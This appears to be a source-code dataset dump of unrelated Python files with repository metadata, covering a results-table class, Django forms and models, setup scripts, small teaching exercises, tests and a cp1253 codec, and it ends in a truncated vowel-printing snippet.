        self.data.update(other.data)
        l0, l1 = len(self.results), len(other.results)
        self.results.update(other.results)
        assert len(self.results) == l0+l1, "Some results were overwritten by merging!"

    def update_all_data(self, data: {str: dict}):
        """ updates the data of all group members that are in the data dict """
        for id_ in self.ids:
            if id_ in data:
                self.data[id_].update(data.get(id_))

    def update_data(self, id_: int, data: dict):
        """ updates the data of group member with slurm id """
        self.data[id_].update(data)

    def update_results(self, metrics: [Metrics]):
        # Compute each metric over the collected series; per result name keep
        # the max of the new Result and any previously stored one.
        # NOTE(review): max([result, None]) relies on Result supporting
        # comparison with None -- verify against the Result class.
        for m in metrics:
            values, missing = self._values(key=m.get_key(), last_k=m.last_k)
            try:
                for result in m.from_values(values):
                    self.results[result.name] = max([result, self.results.get(result.name)])
                    Group.all_result_keys[result.name] = True
            except KeyError:
                raise KeyError('Missing key "%s" in: %s, but the metric requires it' % (m.get_key(), missing))

    def _values(self, key: str, last_k=-1) -> (Union[np.array, None], list):
        """
        all values, different group members on axis 0, time series on axis 1, (can be None)
        and a list of slurm ids where the values are missing
        """
        values = []
        missing = []
        for id_, data in self.data.items():
            if key not in data:
                missing.append(id_)
                continue
            v = np.array([v[2] for v in data.get(key)])  # tensorboard has (step, time, value) triplets
            if isinstance(last_k, int) and (last_k > 0):
                # Keep only the last_k entries of each member's series.
                v = v[-last_k:]
            values.append(v)
        assert all([len(v) == len(values[0]) for v in values]), "different value-array lengths for key=%s" % key
        if len(values) > 0:
            return np.stack(values, axis=0), missing
        return None, missing

    def __header_dict(self, separator: str, **filter_kwargs) -> dict:
        # Column headers, in global registry order, joined by `separator`.
        # param_keys = Group.sorted_param_keys(**filter_kwargs)
        param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
        value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
        return {
            'n': 'name',
            'ids': 'slurm_ids',
            'params': separator.join(param_keys),
            'values': separator.join(value_keys),
        }

    def __table_dict(self, separator: str, **filter_kwargs) -> dict:
        # This group's row values, aligned with __header_dict's columns;
        # missing results fall back to default_result.
        # param_keys = Group.sorted_param_keys(**filter_kwargs)
        param_keys = list(self.__filter(self.all_param_keys, **filter_kwargs).keys())
        value_keys = list(self.__filter(self.all_result_keys, **filter_kwargs).keys())
        return {
            'n': self.name,
            'ids': str(self.ids),
            'params': separator.join([str(self.params.get(k, '')) for k in param_keys]),
            'values': separator.join([self.results.get(k, self.default_result).str for k in value_keys]),
        }

    def get_csv_str_header(self, **filter_kwargs) -> str:
        """ table csv header, e.g. for libre office calc """
        return '{n};{ids};;{params};;{values};'.format(**self.__header_dict(';', **filter_kwargs))

    def get_csv_str(self, **filter_kwargs) -> str:
        """ table csv row, e.g. for libre office calc, printing params and the metric values """
        return '{n};{ids};;{params};;{values};'.format(**self.__table_dict(';', **filter_kwargs))

    def get_latex_str_header(self, **filter_kwargs) -> str:
        """ table header for latex """
        return '{n} & {params} & {values} \\\\'.format(**self.__header_dict(' & ', **filter_kwargs)).replace('_', '\_')

    def get_latex_str(self, **filter_kwargs) -> str:
        """ table row for latex, printing params and the metric values """
        return '{n} & {params} & {values} \\\\'.format(**self.__table_dict(' & ', **filter_kwargs)).replace('_', '\_')
class GroupSeparator(Group):
    """
    simple hack to just insert a midrule into latex tables, and empty rows into csv data
    will probably break everything if added first to a GroupManager, so don't do that
    """
    _id = -1

    def __init__(self, **kwargs):
        # Bug fix: the original wrote `self._id += 1`, which reads the class
        # attribute but assigns an *instance* attribute, so the counter never
        # advanced and every separator was named "separator 0".  Bump the
        # class attribute instead so separators get distinct names.
        GroupSeparator._id += 1
        super().__init__('separator %d' % GroupSeparator._id, [], **kwargs)

    def update_results(self, metrics):
        # Separators carry no jobs, so there is nothing to compute.
        pass

    def get_csv_str(self, **filter_kwargs) -> str:
        """ table row for libre office calc: an empty spacer row """
        return ''

    def get_latex_str(self, **filter_kwargs) -> str:
        """ table row for latex: a midrule separator """
        return '\\midrule'
|
[
"[email protected]"
] | |
e5f98ccd8f816d3621fa6a5b9fd0132e0965826b
|
30a89ae47ca79e4ced151908f4059cd77ade30ef
|
/order/forms.py
|
0c700dce796932a329f19a1102f5113624a6fcd8
|
[] |
no_license
|
harshit8858/mindful_project1_salesapp
|
0bd80c40b2349fe08744dcd0625283c5b6ba4029
|
66f7c7af868518898aa6422d1b17ca9f7cf433ef
|
refs/heads/master
| 2020-03-24T00:02:49.972583 | 2018-08-18T07:56:49 | 2018-08-18T07:56:49 | 142,269,897 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 328 |
py
|
from django import forms
from .models import *
class OrderForm(forms.ModelForm):
    """ModelForm exposing the editable fields of an Order."""
    class Meta:
        model = Order
        # Field order here controls the rendered form order.
        fields = [
            'customer',
            'remark',
            'product',
            'quantity',
            'price',
            'discount',
            'tax',
            'total',
        ]
|
[
"[email protected]"
] | |
8f4e42b65ce09e4a562f2d4b298babce0fd4be3b
|
2417d9f6afe95ba19354c65bfb400556f2eb2e19
|
/setup.py
|
2a91c65f19fbb3863f4728098116fca13710074a
|
[
"Apache-2.0"
] |
permissive
|
rakeshnb/pixiedust
|
39f1249a867719919441488f085e1f60519dae58
|
fb5198c7564589c267147d7bdee1f798e7b361ef
|
refs/heads/master
| 2020-05-23T08:09:42.603871 | 2016-10-07T22:08:10 | 2016-10-07T22:08:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 732 |
py
|
from setuptools import setup
# Package definition for pixiedust; version and the explicit package list are
# maintained by hand, `include_package_data` pulls in MANIFEST.in files.
setup(name='pixiedust',
      version='0.38',
      description='Misc helpers for Spark Python Notebook',
      url='https://github.com/ibm-cds-labs/pixiedust',
      install_requires=['maven-artifact','mpld3'],
      author='David Taieb',
      author_email='[email protected]',
      license='Apache 2.0',
      packages=['pixiedust','pixiedust.packageManager','pixiedust.display',
                'pixiedust.display.table','pixiedust.display.graph','pixiedust.display.chart','pixiedust.display.chart.plugins',
                'pixiedust.display.tests','pixiedust.display.download',
                'pixiedust.services',
                'pixiedust.utils'],
      include_package_data=True,
      zip_safe=False)
|
[
"[email protected]"
] | |
aea5124f9f2718dae828e8f08e419c0c88fa27e0
|
1d60c5a7b8ce6277bff514e376f79848f706344c
|
/Data Analyst with Python - Career Track/01. Introduction to Data Science in Python/04. Different Types of Plots/05. Modifying histograms.py
|
1ce32da1b97d613df25adfdb3b264ed5dbd7b8c8
|
[] |
no_license
|
DidiMilikina/DataCamp
|
338c6e6d3b4f5b6c541c1aba155a36e9ee24949d
|
3bf2cf3c1430190a7f8e54efda7d50a5fd66f244
|
refs/heads/master
| 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 764 |
py
|
'''
Modifying histograms
Let's explore how changes to keyword parameters in a histogram can change the output. Recall that:
range sets the minimum and maximum datapoints that we will include in our histogram.
bins sets the number of points in our histogram.
We'll be exploring the weights of various puppies from the DataFrame puppies. matplotlib has been loaded under the alias plt.
Instructions 1/3
35 XP
Create a histogram of the column weight from the DataFrame puppies.
Change the number of bins to 50.
Change the range to start at 5 and end at 35.
'''
# SOLUTION
# Bug fix: the original left a bare `SOLUTION` identifier (a NameError at
# runtime) and omitted the `bins=50` required by the instructions above.
# Create a histogram with 50 bins over the range 5 to 35
plt.hist(puppies.weight,
         bins=50,
         range=(5, 35))
# Add labels
plt.xlabel('Puppy Weight (lbs)')
plt.ylabel('Number of Puppies')
# Display
plt.show()
|
[
"[email protected]"
] | |
5e95d15bbcb402658a0aa5ca152150228122ffa4
|
88be3911c7e73d4bf71b0482ee6d15f49030463a
|
/SEC31_Regex/Demo_findall.py
|
efd4979649d52b8aed3afc6af63204120a6ce980
|
[] |
no_license
|
skyaiolos/Python_KE
|
85f879d1cb637debd2e3a0239d7c8d7bfb30c827
|
8cc42c8f4d1245de4b79af429f72a9ed2508bc1a
|
refs/heads/master
| 2021-01-22T08:47:47.761982 | 2017-05-28T14:57:02 | 2017-05-28T14:57:02 | 92,634,507 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,028 |
py
|
"""
# Script Description:
Python 正则表达式之RegexObject
"""
__author__ = "爱的彼岸(QQ:3124724)"
__copyright__ = "Copyright 2017,[email protected]"
# Create by Jianguo on 2017/5/7
import re
text = "Tom is 8 years old, Mike is 25 years old."
# 模式对象, 表现编译后的正则表达式(编译为字节码并缓存)
# re.compile(r'模式')
print('findall()'.center(100, '*'))
pattern = re.compile(r'\d+')
print(pattern.findall(text))
print(re.findall(r'\d+', text))
s = "\\author:Tom"
pattern = re.compile(r'\\author')
rex = pattern.findall(s)
print(rex)
text = "Tom is 8 years old, Mike is 25 years old.Peter is 87 years old."
pattern = re.compile(r'\d+')
rex = pattern.findall(text)
print(rex)
p_name = re.compile(r'[A-Z]\w+')
rex_p = p_name.findall(text)
print(rex_p)
p1 = re.compile(r'\d+')
p2 = re.compile(r'[A-Z]\w+')
print('findall() VS finditer()'.center(100, '*'))
print(p1.findall(text))
print()
print('finditer()'.center(30, '*'))
it = p1.finditer(text)
for item in it:
print(item)
|
[
"[email protected]"
] | |
21a700bb20d695f0545a44e8ea56ccd2d5c1ecbd
|
d82ac08e029a340da546e6cfaf795519aca37177
|
/chapter_13_parallel_nn_training_theano/02_array_structures.py
|
041b18247a74fa59fe0cfc17db87096150e8cf80
|
[] |
no_license
|
CSwithJC/PythonMachineLearning
|
4409303c3f4d4177dc509c83e240d7a589b144a0
|
0c4508861e182a8eeacd4645fb93b51b698ece0f
|
refs/heads/master
| 2021-09-04T04:28:14.608662 | 2018-01-15T20:25:36 | 2018-01-15T20:25:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 566 |
py
|
import theano
import numpy as np
from theano import tensor as T
# Config Theano to use 32-bit architecture:
theano.config.floatX = 'float32'
#theano.config.device = 'gpu'

# initialize: a symbolic float32 matrix and its column-wise sum
x = T.fmatrix(name='x')
x_sum = T.sum(x, axis=0)

# compile the symbolic graph into a callable function
calc_sum = theano.function(inputs=[x], outputs=x_sum)

# execute (Python List)
ary = [[1, 2, 3], [1, 2, 3]]
print('Column sum:', calc_sum(ary))

# execute (NumPy array) -- dtype matches the configured floatX
ary = np.array([[1, 2, 3], [1, 2, 3]],
               dtype=theano.config.floatX)
print('Column sum:', calc_sum(ary))

print('TensorType: ', x.type())
|
[
"[email protected]"
] | |
bd82d3e98d1a67cc87a28e599370a8b6475b91ae
|
3467fe90c6c49b4ac86785d1da19d7183b2ac0f5
|
/6002x/findCombination.py
|
85d683714d531ae692f4b2fa142f7782b706f04d
|
[
"MIT"
] |
permissive
|
CarlosEduardoAS/MITx
|
277da453638da672c9946513bfb7a86e7446072b
|
532695d69c77581b6df80c145283b349b75e4973
|
refs/heads/main
| 2023-05-02T13:50:15.283211 | 2021-05-25T20:02:48 | 2021-05-25T20:02:48 | 351,555,645 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,219 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 25 16:10:53 2021
@author: caear
"""
import numpy
import itertools
def find_combination(choices, total):
    """
    choices: a non-empty list of ints
    total: a positive int

    Returns result, a numpy.array of length len(choices)
    such that
        * each element of result is 0 or 1
        * sum(result*choices) == total
        * sum(result) is as small as possible
    In case of ties, returns any result that works.
    If there is no result that gives the exact total,
    pick the one that gives sum(result*choices) closest
    to total without going over.
    """
    weights = numpy.array(choices)
    best_exact = None       # exact match with the fewest picks
    best_under = None       # closest weighted sum strictly below total
    best_under_sum = -1
    for bits in itertools.product([1, 0], repeat=len(choices)):
        picks = numpy.array(bits)
        weighted = int((picks * weights).sum())
        if weighted == total:
            if best_exact is None or picks.sum() < best_exact.sum():
                best_exact = picks
        elif weighted < total:
            # Bug fix: the original compared candidates by sum(result)
            # (number of picks) here, not by sum(result*choices), so it
            # could return a subset far below total (e.g. choices=[9, 2, 2],
            # total=10 returned sum 4 instead of 9).  Compare by closeness.
            if weighted > best_under_sum:
                best_under_sum = weighted
                best_under = picks
    return best_exact if best_exact is not None else best_under
|
[
"[email protected]"
] | |
ea385301144e17aa355e09063a6bd7bb66103bb1
|
d7faf47825b6f8e5abf9a9587f1e7248c0eed1e2
|
/python/ray/tests/test_asyncio_cluster.py
|
bea440bdf4b27bb1b625ec135c2bbc2bd5dd6d5b
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
ggdupont/ray
|
7d7c7f39a8f99a09199fab60897da9e48b8e2645
|
15391026c19f1cbbb8d412e46b01f7998e42f2b9
|
refs/heads/master
| 2023-03-12T06:30:11.428319 | 2021-12-07T05:34:27 | 2021-12-07T05:34:27 | 165,058,028 | 0 | 0 |
Apache-2.0
| 2023-03-04T08:56:50 | 2019-01-10T12:41:09 |
Python
|
UTF-8
|
Python
| false | false | 815 |
py
|
# coding: utf-8
import asyncio
import sys
import pytest
import numpy as np
import ray
from ray.cluster_utils import Cluster, cluster_not_supported
@pytest.mark.xfail(cluster_not_supported, reason="cluster not supported")
@pytest.mark.asyncio
async def test_asyncio_cluster_wait():
    """Ray object refs must be awaitable across a two-node local cluster."""
    cluster = Cluster()
    head_node = cluster.add_node()
    # The second node advertises a custom resource so the task below is
    # forced onto it, exercising cross-node object transfer.
    cluster.add_node(resources={"OTHER_NODE": 100})

    ray.init(address=head_node.address)

    @ray.remote(num_cpus=0, resources={"OTHER_NODE": 1})
    def get_array():
        return np.random.random((192, 1080, 3)).astype(np.uint8)  # ~ 0.5MB

    object_ref = get_array.remote()
    # Awaiting an ObjectRef resolves when the object is available; the
    # timeout prevents a hang if transfer fails.
    await asyncio.wait_for(object_ref, timeout=10)

    ray.shutdown()
    cluster.shutdown()


if __name__ == "__main__":
    import pytest
    sys.exit(pytest.main(["-v", __file__]))
|
[
"[email protected]"
] | |
adf942ef17cc289e1c3cf16a609ecac205d03692
|
fc314838b18c14a00310f0059d5358c7c4afabd6
|
/special/models.py
|
6796cb77ef4370af265ada4e6ba8966f501a7cd4
|
[
"MIT"
] |
permissive
|
opendream/asip
|
5cb4b997fab2438193ae7490c159efced6dc3d91
|
20583aca6393102d425401d55ea32ac6b78be048
|
refs/heads/master
| 2022-11-28T23:28:18.405604 | 2020-03-10T04:56:23 | 2020-03-10T04:56:23 | 190,504,979 | 1 | 1 |
MIT
| 2022-11-22T01:10:46 | 2019-06-06T03:06:03 |
HTML
|
UTF-8
|
Python
| false | false | 1,126 |
py
|
from django.db import models
# Create your models here.
from common.constants import STATUS_PUBLISHED, STATUS_CHOICES
from common.models import AbstractPermalink, CommonTrashModel
import files_widget
class Special(CommonTrashModel, AbstractPermalink):
    """A 'special' feature page, addressed by its permalink slug."""
    title = models.CharField(max_length=512)
    # Optional banner image shown at the top of the special page.
    image = files_widget.ImageField(verbose_name='Banner Image', null=True, blank=True)
    status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
    created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
    changed = models.DateTimeField(auto_now=True, null=True, blank=True)
    def __unicode__(self):
        """Python 2 string representation: the permalink slug."""
        return self.permalink
    def get_absolute_url(self):
        """Return the site-relative URL for this special."""
        return '/%s/' % self.permalink
class Page(CommonTrashModel, AbstractPermalink):
    """A single page belonging to a Special."""
    # Parent special; nullable so a page can exist unattached.
    special = models.ForeignKey(Special, related_name='pages', null=True, blank=True)
    status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
    created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
    changed = models.DateTimeField(auto_now=True, null=True, blank=True)
|
[
"[email protected]"
] | |
dd57282a6f43709922c5f7cbe9ce63f81e77bcd0
|
414db33a43c50a500741784eea627ba98bb63e27
|
/0x0A-python-inheritance/9-rectangle.py
|
4092a9005ebb2873185b2c9b324c123b1c9c6344
|
[] |
no_license
|
rayraib/holbertonschool-higher_level_programming
|
2308ea02bd7f97eae3643e3ce0a6489cc1ad9ff5
|
6b4196eb890ffcb91e541431da9f5f57c5b85d4e
|
refs/heads/master
| 2021-09-14T09:12:26.664653 | 2018-05-11T03:23:12 | 2018-05-11T03:23:12 | 113,070,818 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 746 |
py
|
#!/usr/bin/python3
BaseGeometry = __import__('7-base_geometry').BaseGeometry
'''
subclass of BaseGeometry class
'''
class Rectangle(BaseGeometry):
    '''Rectangle defined by a validated width and height.'''
    def __init__(self, width, height):
        '''Validate both dimensions (height first, as before) and store them.'''
        self.integer_validator("height", height)
        self.__height = height
        self.integer_validator("width", width)
        self.__width = width
    def area(self):
        '''Return the rectangle's area.'''
        return self.__height * self.__width
    def __str__(self):
        '''Informal representation: [Rectangle] width/height.'''
        return "[Rectangle] {}/{}".format(self.__width, self.__height)
|
[
"[email protected]"
] | |
902b09ed2ee809a19293ec13b3fccd3cf58d2dbf
|
6ffd23679939f59f0a09c9507a126ba056b239d7
|
/imperative/python/megengine/core/_trace_option.py
|
638c142a12249cc9b7381b3c378d5b01f5b5ff9e
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
MegEngine/MegEngine
|
74c1c9b6022c858962caf7f27e6f65220739999f
|
66b79160d35b2710c00befede0c3fd729109e474
|
refs/heads/master
| 2023-08-23T20:01:32.476848 | 2023-08-01T07:12:01 | 2023-08-11T06:04:12 | 248,175,118 | 5,697 | 585 |
Apache-2.0
| 2023-07-19T05:11:07 | 2020-03-18T08:21:58 |
C++
|
UTF-8
|
Python
| false | false | 862 |
py
|
# -*- coding: utf-8 -*-
import os
from ._imperative_rt.core2 import set_cpp_use_symbolic_shape
# Whether Tensor.shape evaluates symbolically (returns a tensor, not a tuple).
_use_symbolic_shape = False
# Environment variable override for the default above.
if os.environ.get("MEGENGINE_USE_SYMBOLIC_SHAPE"):
    _use_symbolic_shape = True
# Whether the XLA backend is enabled.
_use_xla_backend = False
def use_symbolic_shape() -> bool:
    r"""Returns whether tensor.shape returns a tensor instead of a tuple.

    The flag is set via :func:`set_symbolic_shape` or the
    ``MEGENGINE_USE_SYMBOLIC_SHAPE`` environment variable.
    """
    return _use_symbolic_shape
def set_symbolic_shape(option: bool):
    r"""Sets whether tensor.shape returns a tensor instead of a tuple.

    Returns the previous setting so callers can restore it later.
    """
    global _use_symbolic_shape
    previous, _use_symbolic_shape = _use_symbolic_shape, option
    return previous
def use_xla_backend() -> bool:
    """Return whether the XLA backend is currently enabled."""
    return _use_xla_backend
def set_use_xla_backend(option: bool) -> bool:
    """Enable or disable the XLA backend; return the previous setting."""
    global _use_xla_backend
    previous, _use_xla_backend = _use_xla_backend, option
    return previous
# Hand the Python-side predicate to the C++ core so it can query the flag.
set_cpp_use_symbolic_shape(use_symbolic_shape)
|
[
"[email protected]"
] | |
6c54d81e4263105997a4b7dbcb57d4d4673fe0e2
|
5d0fe4a9e026234fe15e6c4380355061bb4dac64
|
/tests/functional/pages/profile/individual_enter_your_email_and_password.py
|
4ed6007a0f1fe073b148c538f8fdceb4a783b69b
|
[
"MIT"
] |
permissive
|
uktrade/directory-tests
|
37e243862da8ac594cf1ea06ade714db5e1aba03
|
39ec6c26203580238e65566a472cbd80916e6726
|
refs/heads/master
| 2022-08-09T16:58:56.248982 | 2022-08-01T12:25:10 | 2022-08-01T12:25:10 | 71,367,747 | 4 | 3 |
MIT
| 2022-08-01T12:26:09 | 2016-10-19T14:48:57 |
Python
|
UTF-8
|
Python
| false | false | 1,702 |
py
|
# -*- coding: utf-8 -*-
"""Profile - Individual - Enter your business email address and set a password"""
from requests import Response, Session
from directory_tests_shared import PageType, Service, URLs
from tests.functional.utils.context_utils import Actor
from tests.functional.utils.request import (
Method,
check_response,
check_url,
make_request,
)
SERVICE = Service.PROFILE
NAME = "Individual enter your email address and set a password"
TYPE = PageType.FORM
URL = URLs.PROFILE_ENROL_INDIVIDUAL_ENTER_YOUR_EMAIL_AND_PASSWORD.absolute
# Copy that must appear in the page body for should_be_here() to pass.
EXPECTED_STRINGS = [
    "Enter your email address and set a password",
    "Your email address",
    "Set a password",
    "Confirm password",
    "Tick this box to accept the",
]
def go_to(session: Session) -> Response:
    """GET this form page using the given requests session."""
    return make_request(Method.GET, URL, session=session)
def should_be_here(response: Response):
    """Assert the response is this page: right URL, 200, expected copy present."""
    check_url(response, URL)
    check_response(response, 200, body_contains=EXPECTED_STRINGS)
def submit(actor: Actor) -> Response:
    """POST the enrolment form with the actor's email and password.

    NOTE(review): the payload is sent via ``files=`` (multipart/form-data)
    rather than ``data=`` — presumably the endpoint requires multipart;
    see the ``no_filename_in_multipart_form_data`` flag below. Confirm.
    """
    session = actor.session
    headers = {"Referer": URL}
    data = {
        "csrfmiddlewaretoken": actor.csrfmiddlewaretoken,
        "individual_user_enrolment_view-current_step": "user-account",
        "user-account-email": actor.email,
        "user-account-password": actor.password,
        "user-account-password_confirmed": actor.password,
        "user-account-terms_agreed": "on",
        "user-account-remote_password_error": None,
        # "test mode" placeholder — presumably bypasses captcha in test envs.
        "g-recaptcha-response": "test mode",
    }
    return make_request(
        Method.POST,
        URL,
        session=session,
        headers=headers,
        files=data,
        no_filename_in_multipart_form_data=True,
    )
|
[
"[email protected]"
] | |
905cb8c5f6d0197487ae82ee1d0f00475fb00efe
|
2153a7ecfa69772797e379ff5642d52072a69b7c
|
/library/test/test_compiler/sbs_code_tests/70_class.py
|
64ce08233157b32ce3204a302018c8a61bc3d153
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"Python-2.0"
] |
permissive
|
KCreate/skybison
|
a3789c84541f39dc6f72d4d3eb9783b9ed362934
|
d1740e08d8de85a0a56b650675717da67de171a0
|
refs/heads/trunk
| 2023-07-26T04:50:55.898224 | 2021-08-31T08:20:46 | 2021-09-02T19:25:08 | 402,908,053 | 1 | 0 |
NOASSERTION
| 2021-09-03T22:05:57 | 2021-09-03T22:05:57 | null |
UTF-8
|
Python
| false | false | 422 |
py
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
class C:
    pass  # intentionally empty; the EXPECTED section below pins its compiled bytecode
# EXPECTED:
[
LOAD_BUILD_CLASS(0),
LOAD_CONST(Code((1, 0))),
LOAD_CONST('C'),
MAKE_FUNCTION(0),
LOAD_CONST('C'),
CALL_FUNCTION(2),
STORE_NAME('C'),
...,
CODE_START('C'),
LOAD_NAME('__name__'),
STORE_NAME('__module__'),
LOAD_CONST('C'),
STORE_NAME('__qualname__'),
...,
]
|
[
"[email protected]"
] | |
ca882b27134e8b7e97382771cc03bef0fcd2a3fe
|
242f1dafae18d3c597b51067e2a8622c600d6df2
|
/src/1300-1399/1344.angle.clock.py
|
8f16b6ea976d0a6986c2e132b2eb2b95f928c1e3
|
[] |
no_license
|
gyang274/leetcode
|
a873adaa083270eb05ddcdd3db225025533e0dfe
|
6043134736452a6f4704b62857d0aed2e9571164
|
refs/heads/master
| 2021-08-07T15:15:01.885679 | 2020-12-22T20:57:19 | 2020-12-22T20:57:19 | 233,179,192 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
class Solution:
    def angleClock(self, hour: int, minutes: int) -> float:
        """Return the smaller angle, in degrees, between the two clock hands."""
        hour_hand = hour % 12
        minute_hand = minutes % 60
        # Hour hand moves 30° per hour plus a fractional advance from minutes;
        # minute hand moves 6° per minute.
        hour_angle = hour_hand * 30 + minute_hand / 60 * 30
        minute_angle = minute_hand * 6
        gap = abs(hour_angle - minute_angle)
        return min(gap, 360 - gap)
if __name__ == '__main__':
    solver = Solution()
    cases = [
        (2, 58),
    ]
    # Evaluate and report each case in order.
    for case in cases:
        answer = solver.angleClock(*case)
        print(f"case: {case} | solution: {answer}")
|
[
"[email protected]"
] | |
66ebb027ebb9fcf1674157a1fd4328b8c803a1b6
|
60aa3bcf5ace0282210685e74ee8ed31debe1769
|
/base/lib/encodings/cp1253.py
|
e32862ea0e2b0a2d349861903d7635099bf924b3
|
[] |
no_license
|
TheBreadGuy/sims4-ai-engine
|
42afc79b8c02527353cc084117a4b8da900ebdb4
|
865212e841c716dc4364e0dba286f02af8d716e8
|
refs/heads/master
| 2023-03-16T00:57:45.672706 | 2016-05-01T17:26:01 | 2016-05-01T17:26:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,776 |
py
|
import codecs
class Codec(codecs.Codec):
    """Stateless cp1253 codec backed by the charmap tables defined below."""
    __qualname__ = 'Codec'
    def encode(self, input, errors='strict'):
        return codecs.charmap_encode(input, errors, encoding_table)
    def decode(self, input, errors='strict'):
        return codecs.charmap_decode(input, errors, decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental cp1253 encoder; charmap encoding keeps no state between calls."""
    __qualname__ = 'IncrementalEncoder'
    def encode(self, input, final=False):
        return codecs.charmap_encode(input, self.errors, encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental cp1253 decoder; charmap decoding keeps no state between calls."""
    __qualname__ = 'IncrementalDecoder'
    def decode(self, input, final=False):
        return codecs.charmap_decode(input, self.errors, decoding_table)[0]
class StreamWriter(Codec, codecs.StreamWriter):
    """Stream writer for cp1253; all conversion is inherited from Codec."""
    __qualname__ = 'StreamWriter'
class StreamReader(Codec, codecs.StreamReader):
    """Stream reader for cp1253; all conversion is inherited from Codec."""
    __qualname__ = 'StreamReader'
def getregentry():
    """Return the codecs.CodecInfo entry used to register the cp1253 codec."""
    # One Codec instance serves both directions; it is stateless.
    codec = Codec()
    return codecs.CodecInfo(
        name='cp1253',
        encode=codec.encode,
        decode=codec.decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
decoding_table = '\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\ufffe‚ƒ„…†‡\ufffe‰\ufffe‹\ufffe\ufffe\ufffe\ufffe\ufffe‘’“”•–—\ufffe™\ufffe›\ufffe\ufffe\ufffe\ufffe\xa0΅Ά£¤¥¦§¨©\ufffe«¬\xad®―°±²³΄µ¶·ΈΉΊ»Ό½ΎΏΐΑΒΓΔΕΖΗΘΙΚΛΜΝΞΟΠΡ\ufffeΣΤΥΦΧΨΩΪΫάέήίΰαβγδεζηθικλμνξοπρςστυφχψωϊϋόύώ\ufffe'
encoding_table = codecs.charmap_build(decoding_table)
|
[
"[email protected]"
] | |
82a31547b7df987e69677a23ad29f56ad9a5ccbe
|
41c5f7da28b87a3034754254d21791b322e819d8
|
/test/test_json_analysis_result_sub_group_all_of.py
|
e181c4639ce155f9ebebe587db93934f73ee12ae
|
[] |
no_license
|
MADANA-IO/madana-apiclient-python
|
16cb3eb807897903df2a885a94a2c02fc405818a
|
40dc21ab43d9565ac3dff86d7270093cce112753
|
refs/heads/master
| 2023-03-08T05:02:32.616469 | 2021-02-11T10:17:30 | 2021-02-11T10:17:30 | 287,797,297 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,151 |
py
|
# coding: utf-8
"""
madana-api
<h1>API Quickstart Guide</h1> <p>This documentation contains a Quickstart Guide, a few <a href=\"downloads.html\">sample clients</a> for download and information about the available <a href=\"resources.html\">endpoints</a> and <a href=\"data.html\">DataTypes</a> </p> <p>The <a target=\"_blank\" href=\"http://madana-explorer-staging.eu-central-1.elasticbeanstalk.com/login\"> MADANA Explorer</a> can be used to verify the interactions with the API</p> <p>Internal use only. For more information visit <a href=\"https://www.madana.io\">www.madana.io</a></p> <br> <br> # noqa: E501
The version of the OpenAPI document: 0.4.12
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import madana_sampleclient_python
from madana_sampleclient_python.models.json_analysis_result_sub_group_all_of import JsonAnalysisResultSubGroupAllOf # noqa: E501
from madana_sampleclient_python.rest import ApiException
class TestJsonAnalysisResultSubGroupAllOf(unittest.TestCase):
    """Unit test stubs for the generated JsonAnalysisResultSubGroupAllOf model."""
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def make_instance(self, include_optional):
        """Build a JsonAnalysisResultSubGroupAllOf instance.

        include_optional: when False only required params are set,
        when True optional params are set as well.
        """
        # model = madana_sampleclient_python.models.json_analysis_result_sub_group_all_of.JsonAnalysisResultSubGroupAllOf()  # noqa: E501
        if include_optional :
            return JsonAnalysisResultSubGroupAllOf(
                filter = '0'
            )
        else :
            return JsonAnalysisResultSubGroupAllOf(
            )
    def testJsonAnalysisResultSubGroupAllOf(self):
        """Smoke test: constructing with and without optionals must not raise."""
        inst_req_only = self.make_instance(include_optional=False)
        inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
a3107b0c1a2da9aed5839d1306f79a2aa6a91e03
|
0d2f636592dc12458254d793f342857298c26f12
|
/vowel.py
|
d1da799f259f873b5637804df56c23b3325a671c
|
[] |
no_license
|
chenpc1214/test
|
c6b545dbe13e672f11c58464405e024394fc755b
|
8610320686c499be2f5fa36ba9f11935aa6d657b
|
refs/heads/master
| 2022-12-13T22:44:41.256315 | 2020-09-08T16:25:49 | 2020-09-08T16:25:49 | 255,796,035 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 136 |
py
|
# Walk the word and echo every vowel it contains, in order.
vowel = ['a', 'e', 'i', 'o', 'u']
word = "milliway"
for ch in word:
